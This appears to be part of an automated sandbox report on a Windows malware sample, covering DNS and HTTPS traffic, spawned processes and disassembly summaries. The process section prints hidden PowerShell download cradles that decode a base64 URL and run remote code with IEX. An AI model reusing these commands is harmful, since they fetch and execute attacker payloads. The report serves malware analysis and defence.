                                  Jan 10, 2025 22:21:42.201565981 CET1.1.1.1192.168.2.110x78e1No error (0)zjhy.coimbratratadores.com104.21.96.1A (IP address)IN (0x0001)false
                                  Jan 10, 2025 22:21:42.201565981 CET1.1.1.1192.168.2.110x78e1No error (0)zjhy.coimbratratadores.com104.21.48.1A (IP address)IN (0x0001)false
                                  Jan 10, 2025 22:21:42.201565981 CET1.1.1.1192.168.2.110x78e1No error (0)zjhy.coimbratratadores.com104.21.112.1A (IP address)IN (0x0001)false
                                  Jan 10, 2025 22:21:42.201565981 CET1.1.1.1192.168.2.110x78e1No error (0)zjhy.coimbratratadores.com104.21.32.1A (IP address)IN (0x0001)false
                                  Jan 10, 2025 22:21:42.201565981 CET1.1.1.1192.168.2.110x78e1No error (0)zjhy.coimbratratadores.com104.21.64.1A (IP address)IN (0x0001)false
                                  Jan 10, 2025 22:21:42.201565981 CET1.1.1.1192.168.2.110x78e1No error (0)zjhy.coimbratratadores.com104.21.80.1A (IP address)IN (0x0001)false
                                  Jan 10, 2025 22:21:42.201565981 CET1.1.1.1192.168.2.110x78e1No error (0)zjhy.coimbratratadores.com104.21.16.1A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • zjhy.coimbratratadores.com

                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.1149707104.21.96.14435708C:\Users\user\Desktop\87J30ulb4q.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-10 21:21:42 UTC168OUTGET /gyofchhr/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfpRHdvRHfwkDM1AzM HTTP/1.1
                                  Host: zjhy.coimbratratadores.com
                                  Connection: Keep-Alive
                                  2025-01-10 21:21:43 UTC1094INHTTP/1.1 401 Unauthorized
                                  Date: Fri, 10 Jan 2025 21:21:43 GMT
                                  Content-Length: 0
                                  Connection: close
                                  Cache-Control: no-store
                                  X-Robots-Tag: noindex, nofollow
                                  X-Frame-Options: DENY
                                  X-Content-Type-Options: nosniff
                                  Referrer-Policy: no-referrer
                                  Feature-Policy: camera 'none'; microphone 'none'
                                  Permissions-Policy: camera=(), microphone=()
                                  Cross-Origin-Opener-Policy: same-origin
                                  Cross-Origin-Resource-Policy: same-site
                                  cf-cache-status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tLNyB%2BbT3lALIPdADUMaVTvHRAYsJ6I2LSIVYh8E0aouA52rVZsVroRDC%2BrsLXKrLge%2F82yWyTCTYpKXb29akQD%2FYsONgDOtfaFs%2FFx%2BdL0qOmLG9poyrE1EB4GBSEuIHUPKcKqWF3ntPVCLGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8fffb7e349e14363-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1556&rtt_var=613&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2857&recv_bytes=782&delivery_rate=1876606&cwnd=240&unsent_bytes=0&cid=e35d7c11d6ccbcd1&ts=576&x=0"


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.1149708104.21.96.14437224C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-10 21:21:44 UTC90OUTGET /jkqjcpxpnhtgxr HTTP/1.1
                                  Host: zjhy.coimbratratadores.com
                                  Connection: Keep-Alive
                                  2025-01-10 21:21:45 UTC1088INHTTP/1.1 401 Unauthorized
                                  Date: Fri, 10 Jan 2025 21:21:45 GMT
                                  Content-Length: 0
                                  Connection: close
                                  Cache-Control: no-store
                                  X-Robots-Tag: noindex, nofollow
                                  X-Frame-Options: DENY
                                  X-Content-Type-Options: nosniff
                                  Referrer-Policy: no-referrer
                                  Feature-Policy: camera 'none'; microphone 'none'
                                  Permissions-Policy: camera=(), microphone=()
                                  Cross-Origin-Opener-Policy: same-origin
                                  Cross-Origin-Resource-Policy: same-site
                                  cf-cache-status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BgVbo3xOcLmYxAby3LtcRUCURWio%2BjkacKsbhF4voDQn6wNmoXjpC94%2FIrgeMqvcB6WUZTxF2UBWsjwlCYrWEtlkZ6rSOSRrMlbmF4PNNa%2FYmQbXOaLEd7qNsdbrcTOgCMDLZIUrWi747IvFKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8fffb7f09b6172a4-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1954&min_rtt=1948&rtt_var=743&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1460000&cwnd=212&unsent_bytes=0&cid=2037fa58cc0a617b&ts=399&x=0"


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.1149740104.21.96.14437452C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-10 21:21:53 UTC90OUTGET /ukbhsxzcjwqypk HTTP/1.1
                                  Host: zjhy.coimbratratadores.com
                                  Connection: Keep-Alive
                                  2025-01-10 21:21:53 UTC1088INHTTP/1.1 401 Unauthorized
                                  Date: Fri, 10 Jan 2025 21:21:53 GMT
                                  Content-Length: 0
                                  Connection: close
                                  Cache-Control: no-store
                                  X-Robots-Tag: noindex, nofollow
                                  X-Frame-Options: DENY
                                  X-Content-Type-Options: nosniff
                                  Referrer-Policy: no-referrer
                                  Feature-Policy: camera 'none'; microphone 'none'
                                  Permissions-Policy: camera=(), microphone=()
                                  Cross-Origin-Opener-Policy: same-origin
                                  Cross-Origin-Resource-Policy: same-site
                                  cf-cache-status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LEkfEJ1BgfZxNjiSDrjNylPWXOAvMF6FMR09CGolng8YglYoQbdD5zxVjNZAOIEODN63JWn4BmHP06wCifXQ%2Ftk%2F6mjL2Tmy62R88Op%2FY5kn0aa8IhfXI3rzFpL8IIPhiT6DtC5V46qFyoGY5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8fffb8262bbdc32e-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1587&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2856&recv_bytes=704&delivery_rate=1820448&cwnd=178&unsent_bytes=0&cid=018c6c1059f19cd1&ts=402&x=0"


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.1149788104.21.96.14437684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-10 21:22:01 UTC90OUTGET /ukbhsxzcjwqypk HTTP/1.1
                                  Host: zjhy.coimbratratadores.com
                                  Connection: Keep-Alive
                                  2025-01-10 21:22:01 UTC1088INHTTP/1.1 401 Unauthorized
                                  Date: Fri, 10 Jan 2025 21:22:01 GMT
                                  Content-Length: 0
                                  Connection: close
                                  Cache-Control: no-store
                                  X-Robots-Tag: noindex, nofollow
                                  X-Frame-Options: DENY
                                  X-Content-Type-Options: nosniff
                                  Referrer-Policy: no-referrer
                                  Feature-Policy: camera 'none'; microphone 'none'
                                  Permissions-Policy: camera=(), microphone=()
                                  Cross-Origin-Opener-Policy: same-origin
                                  Cross-Origin-Resource-Policy: same-site
                                  cf-cache-status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=09SXW54vHSlVirhjOzPEEZRyPV6gnSTKhCKOa3CGTHvg0DTtxLgXcJvjnN4QJUY7TTzQl%2BaSJssNl4Y0P2%2B6jGCQdzAA1gGjzd90CJp2dXbtOfblyvePAtoniXm8kc3CB8gsqP0C%2BKTeWE3KwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8fffb8557e5d1a48-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2386&min_rtt=2095&rtt_var=1368&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2856&recv_bytes=704&delivery_rate=659588&cwnd=157&unsent_bytes=0&cid=7b7a98bdb4fb956f&ts=425&x=0"


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:16:21:40
                                  Start date:10/01/2025
                                  Path:C:\Users\user\Desktop\87J30ulb4q.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\87J30ulb4q.exe"
                                  Imagebase:0x430000
                                  File size:23'040 bytes
                                  MD5 hash:F60CA825AA99F293F45FD16610D64A45
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:1
                                  Start time:16:21:40
                                  Start date:10/01/2025
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff68cce0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:8
                                  Start time:16:21:42
                                  Start date:10/01/2025
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)"
                                  Imagebase:0xe10000
                                  File size:433'152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:9
                                  Start time:16:21:49
                                  Start date:10/01/2025
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)"
                                  Imagebase:0x7ff6eb350000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:10
                                  Start time:16:21:49
                                  Start date:10/01/2025
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff68cce0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:12
                                  Start time:16:21:57
                                  Start date:10/01/2025
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)"
                                  Imagebase:0x7ff6eb350000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:13
                                  Start time:16:21:57
                                  Start date:10/01/2025
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff68cce0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:13.1%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:3
                                    Total number of Limit Nodes:0
                                    execution_graph 4954 a57958 4955 a579ec CreateProcessA 4954->4955 4957 a57bb8 4955->4957 4957->4957

                                    Executed Functions

                                    Function 00A54C78 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 313 a54c78-a54cde 315 a54ce0-a54ceb 313->315 316 a54d28-a54d2a 313->316 315->316 317 a54ced-a54cf9 315->317 318 a54d2c-a54d45 316->318 319 a54d1c-a54d26 317->319 320 a54cfb-a54d05 317->320 324 a54d47-a54d53 318->324 325 a54d91-a54d93 318->325 319->318 322 a54d07 320->322 323 a54d09-a54d18 320->323 322->323 323->323 326 a54d1a 323->326 324->325 327 a54d55-a54d61 324->327 328 a54d95-a54ded 325->328 326->319 329 a54d84-a54d8f 327->329 330 a54d63-a54d6d 327->330 337 a54e37-a54e39 328->337 338 a54def-a54dfa 328->338 329->328 331 a54d71-a54d80 330->331 332 a54d6f 330->332 331->331 334 a54d82 331->334 332->331 334->329 339 a54e3b-a54e53 337->339 338->337 340 a54dfc-a54e08 338->340 347 a54e55-a54e60 339->347 348 a54e9d-a54e9f 339->348 341 a54e2b-a54e35 340->341 342 a54e0a-a54e14 340->342 341->339 343 a54e16 342->343 344 a54e18-a54e27 342->344 343->344 344->344 346 a54e29 344->346 346->341 347->348 350 a54e62-a54e6e 347->350 349 a54ea1-a54ef2 348->349 358 a54ef8-a54f06 349->358 351 a54e91-a54e9b 350->351 352 a54e70-a54e7a 350->352 351->349 354 a54e7c 352->354 355 a54e7e-a54e8d 352->355 354->355 355->355 356 a54e8f 355->356 356->351 359 a54f0f-a54f6f 358->359 360 a54f08-a54f0e 358->360 367 a54f71-a54f75 359->367 368 a54f7f-a54f83 359->368 360->359 367->368 369 a54f77 367->369 370 a54f85-a54f89 368->370 371 a54f93-a54f97 368->371 369->368 370->371 372 a54f8b 370->372 373 a54fa7-a54fab 371->373 374 a54f99-a54f9d 371->374 372->371 376 a54fad-a54fb1 373->376 377 a54fbb-a54fbf 373->377 374->373 375 a54f9f-a54fa2 call a503d4 374->375 375->373 376->377 379 a54fb3-a54fb6 call a503d4 376->379 380 a54fc1-a54fc5 377->380 381 a54fcf-a54fd3 377->381 379->377 380->381 383 a54fc7-a54fca call a503d4 380->383 384 a54fd5-a54fd9 381->384 385 a54fe3-a54fe7 381->385 383->381 384->385 387 a54fdb 384->387 388 a54ff7 385->388 389 a54fe9-a54fed 385->389 387->385 391 a54ff8 388->391 389->388 390 a54fef 389->390 390->388 391->391
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1335881902.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a50000_87J30ulb4q.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: \V]m
                                    • API String ID: 0-4105700344
                                    • Opcode ID: 94c5747883552d0f597ddac55e440d459947d192758afa0ebbdeaad04117f8cd
                                    • Instruction ID: c829fdd9c9c304b05131ba01e005c8e7f7dd565d635de375597c1b50624c1139
                                    • Opcode Fuzzy Hash: 94c5747883552d0f597ddac55e440d459947d192758afa0ebbdeaad04117f8cd
                                    • Instruction Fuzzy Hash: CBB15F71E002099FDB14CFA9C8857DDBBF2BF8C719F148529E815E7294EB749889CB41
                                    Function 00A55548 Relevance: .3, Instructions: 266COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 603 a55548-a555ae 605 a555b0-a555bb 603->605 606 a555f8-a555fa 603->606 605->606 608 a555bd-a555c9 605->608 607 a555fc-a55615 606->607 615 a55617-a55623 607->615 616 a55661-a55663 607->616 609 a555ec-a555f6 608->609 610 a555cb-a555d5 608->610 609->607 611 a555d7 610->611 612 a555d9-a555e8 610->612 611->612 612->612 614 a555ea 612->614 614->609 615->616 618 a55625-a55631 615->618 617 a55665-a5567d 616->617 624 a556c7-a556c9 617->624 625 a5567f-a5568a 617->625 619 a55654-a5565f 618->619 620 a55633-a5563d 618->620 619->617 622 a55641-a55650 620->622 623 a5563f 620->623 622->622 626 a55652 622->626 623->622 628 a556cb-a556e3 624->628 625->624 627 a5568c-a55698 625->627 626->619 629 a556bb-a556c5 627->629 630 a5569a-a556a4 627->630 635 a556e5-a556f0 628->635 636 a5572d-a5572f 628->636 629->628 631 a556a6 630->631 632 a556a8-a556b7 630->632 631->632 632->632 634 a556b9 632->634 634->629 635->636 638 a556f2-a556fe 635->638 637 a55731-a557a4 636->637 647 a557aa-a557b8 637->647 639 a55721-a5572b 638->639 640 a55700-a5570a 638->640 639->637 642 a5570c 640->642 643 a5570e-a5571d 640->643 642->643 643->643 644 a5571f 643->644 644->639 648 a557c1-a55821 647->648 649 a557ba-a557c0 647->649 656 a55831-a55835 648->656 657 a55823-a55827 648->657 649->648 659 a55845-a55849 656->659 660 a55837-a5583b 656->660 657->656 658 a55829 657->658 658->656 662 a55859-a5585d 659->662 663 a5584b-a5584f 659->663 660->659 661 a5583d 660->661 661->659 665 a5586d-a55871 662->665 666 a5585f-a55863 662->666 663->662 664 a55851 663->664 664->662 668 a55881-a55885 665->668 669 a55873-a55877 665->669 666->665 667 a55865 666->667 667->665 671 a55895 668->671 672 a55887-a5588b 668->672 669->668 670 a55879-a5587c call a503d4 669->670 670->668 676 a55896 671->676 672->671 674 a5588d-a55890 call a503d4 672->674 674->671 676->676
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1335881902.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a50000_87J30ulb4q.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 489f4a6b116714fb9c147b3ebe62802b691323501669de012105d8801bf91fa6
                                    • Instruction ID: 4a85cf679919ce9aa0fd2ca9f9bc1ce18631e7a16d3aba67f56ac54d22f7f60d
                                    • Opcode Fuzzy Hash: 489f4a6b116714fb9c147b3ebe62802b691323501669de012105d8801bf91fa6
                                    • Instruction Fuzzy Hash: C2B17B70E00609CFDB10CFB9C99579DBBF2BF88315F288529D815EB294EB749849DB81
                                    Function 00A5794C Relevance: 1.8, APIs: 1, Instructions: 258processCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 201 a5794c-a579f8 203 a57a31-a57a51 201->203 204 a579fa-a57a04 201->204 211 a57a53-a57a5d 203->211 212 a57a8a-a57ab9 203->212 204->203 205 a57a06-a57a08 204->205 206 a57a2b-a57a2e 205->206 207 a57a0a-a57a14 205->207 206->203 209 a57a16 207->209 210 a57a18-a57a27 207->210 209->210 210->210 214 a57a29 210->214 211->212 213 a57a5f-a57a61 211->213 220 a57af2-a57bb6 CreateProcessA 212->220 221 a57abb-a57ac5 212->221 215 a57a84-a57a87 213->215 216 a57a63-a57a6d 213->216 214->206 215->212 218 a57a71-a57a80 216->218 219 a57a6f 216->219 218->218 222 a57a82 218->222 219->218 231 a57bbf-a57c3d 220->231 232 a57bb8-a57bbe 220->232 221->220 223 a57ac7-a57ac9 221->223 222->215 225 a57aec-a57aef 223->225 226 a57acb-a57ad5 223->226 225->220 227 a57ad7 226->227 228 a57ad9-a57ae8 226->228 227->228 228->228 230 a57aea 228->230 230->225 239 a57c4d-a57c51 231->239 240 a57c3f-a57c43 231->240 232->231 242 a57c61-a57c65 239->242 243 a57c53-a57c57 239->243 240->239 241 a57c45-a57c48 call a501c4 240->241 241->239 246 a57c75-a57c79 242->246 247 a57c67-a57c6b 242->247 243->242 245 a57c59-a57c5c call a501c4 243->245 245->242 250 a57c8b-a57c92 246->250 251 a57c7b-a57c81 246->251 247->246 249 a57c6d-a57c70 call a501c4 247->249 249->246 252 a57c94-a57ca3 250->252 253 a57ca9 250->253 251->250 252->253 256 a57caa 253->256 256->256
                                    APIs
                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00A57BA3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1335881902.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a50000_87J30ulb4q.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 84d23bbd9a00a85731a86bfdc958412fb19b3315d3d6e48f518b738facc86204
                                    • Instruction ID: 2c1b475aa405d3cb3bf18f99f0496aff9f3878f5471b60253a6e698e82ca56cd
                                    • Opcode Fuzzy Hash: 84d23bbd9a00a85731a86bfdc958412fb19b3315d3d6e48f518b738facc86204
                                    • Instruction Fuzzy Hash: 92A16C70D0461A9FDB20CF69D881BEDBBF1BF48301F1481AAD859B7240DB749A89CF91
                                    Function 00A57958 Relevance: 1.8, APIs: 1, Instructions: 253processCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 257 a57958-a579f8 259 a57a31-a57a51 257->259 260 a579fa-a57a04 257->260 267 a57a53-a57a5d 259->267 268 a57a8a-a57ab9 259->268 260->259 261 a57a06-a57a08 260->261 262 a57a2b-a57a2e 261->262 263 a57a0a-a57a14 261->263 262->259 265 a57a16 263->265 266 a57a18-a57a27 263->266 265->266 266->266 270 a57a29 266->270 267->268 269 a57a5f-a57a61 267->269 276 a57af2-a57bb6 CreateProcessA 268->276 277 a57abb-a57ac5 268->277 271 a57a84-a57a87 269->271 272 a57a63-a57a6d 269->272 270->262 271->268 274 a57a71-a57a80 272->274 275 a57a6f 272->275 274->274 278 a57a82 274->278 275->274 287 a57bbf-a57c3d 276->287 288 a57bb8-a57bbe 276->288 277->276 279 a57ac7-a57ac9 277->279 278->271 281 a57aec-a57aef 279->281 282 a57acb-a57ad5 279->282 281->276 283 a57ad7 282->283 284 a57ad9-a57ae8 282->284 283->284 284->284 286 a57aea 284->286 286->281 295 a57c4d-a57c51 287->295 296 a57c3f-a57c43 287->296 288->287 298 a57c61-a57c65 295->298 299 a57c53-a57c57 295->299 296->295 297 a57c45-a57c48 call a501c4 296->297 297->295 302 a57c75-a57c79 298->302 303 a57c67-a57c6b 298->303 299->298 301 a57c59-a57c5c call a501c4 299->301 301->298 306 a57c8b-a57c92 302->306 307 a57c7b-a57c81 302->307 303->302 305 a57c6d-a57c70 call a501c4 303->305 305->302 308 a57c94-a57ca3 306->308 309 a57ca9 306->309 307->306 308->309 312 a57caa 309->312 312->312
                                    APIs
                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00A57BA3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1335881902.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a50000_87J30ulb4q.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: f51ea5c9e660f663085d1ad02c7a7d16bc2ace063dd8be7cd7e00c2e30402aeb
                                    • Instruction ID: 3bb738b6dce609f3e82d7381d827372ff11e9713285c22463b3ff29f63218035
                                    • Opcode Fuzzy Hash: f51ea5c9e660f663085d1ad02c7a7d16bc2ace063dd8be7cd7e00c2e30402aeb
                                    • Instruction Fuzzy Hash: 04914C71D0461A9FDB20CF69D881BDDBBB1BF48311F1481AADC58B7240DB749A89CF91
                                    Function 009BD43C Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1335685804.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9bd000_87J30ulb4q.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bdd1796ba3035e6720852c67c07a3f876d198cd0e505abb78e0b94d61e1a3c0d
                                    • Instruction ID: 4c8ce92e95d722c059bed692c200dec47294d8f1171a90e30b15f8ffe40ac95d
                                    • Opcode Fuzzy Hash: bdd1796ba3035e6720852c67c07a3f876d198cd0e505abb78e0b94d61e1a3c0d
                                    • Instruction Fuzzy Hash: 16216A71501200DFCB15DF04CAC0F56BF66FB98324F24C968E8090B2A6D33AE816C7A1
                                    Function 009BD437 Relevance: .1, Instructions: 56COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1335685804.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9bd000_87J30ulb4q.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                    • Instruction ID: bda56cde08eb64897b349228478b60061349ab165b1ab51adc46598f121bcbec
                                    • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                    • Instruction Fuzzy Hash: 46112672504280DFCB16CF00DAC0B56BF72FB94324F24C6A9DC094B666C33AD85ACBA1

                                    Non-executed Functions

                                    Function 00A55D35 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1335881902.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a50000_87J30ulb4q.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: XPyq
                                    • API String ID: 0-2596165108
                                    • Opcode ID: 6b8554dff5dd1bb5e4e24103c238880e70270c1f13b742a838919c8d5a323927
                                    • Instruction ID: 6c7a7197602cdbdc7b0223a81432a4b52320b09fc97ae6237f9d022c47ae526a
                                    • Opcode Fuzzy Hash: 6b8554dff5dd1bb5e4e24103c238880e70270c1f13b742a838919c8d5a323927
                                    • Instruction Fuzzy Hash: 47817C74F082589BCB08EFB8985477EBBB3BBC8701F54C42AD406E7298DE3588069791
                                    Function 00A54930 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1335881902.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a50000_87J30ulb4q.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: \V]m
                                    • API String ID: 0-4105700344
                                    • Opcode ID: 1ea3b64477356d00703f100326a5a0dd2bb88c4c256bdea92015b2d607379273
                                    • Instruction ID: d1958288f54cecd4b85b2ded59fbb5a8fff0c6b24ec1b853ed07c1794240066c
                                    • Opcode Fuzzy Hash: 1ea3b64477356d00703f100326a5a0dd2bb88c4c256bdea92015b2d607379273
                                    • Instruction Fuzzy Hash: 3C918270E00209DFDF14CFA9C9857DEBBF2BF88359F148529D805AB254EB749889CB85

                                    Executed Functions

                                    Function 07370590 Relevance: 11.7, Strings: 9, Instructions: 423COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.1317621887.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_7370000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$$eq$$eq$$eq
                                    • API String ID: 0-106650353
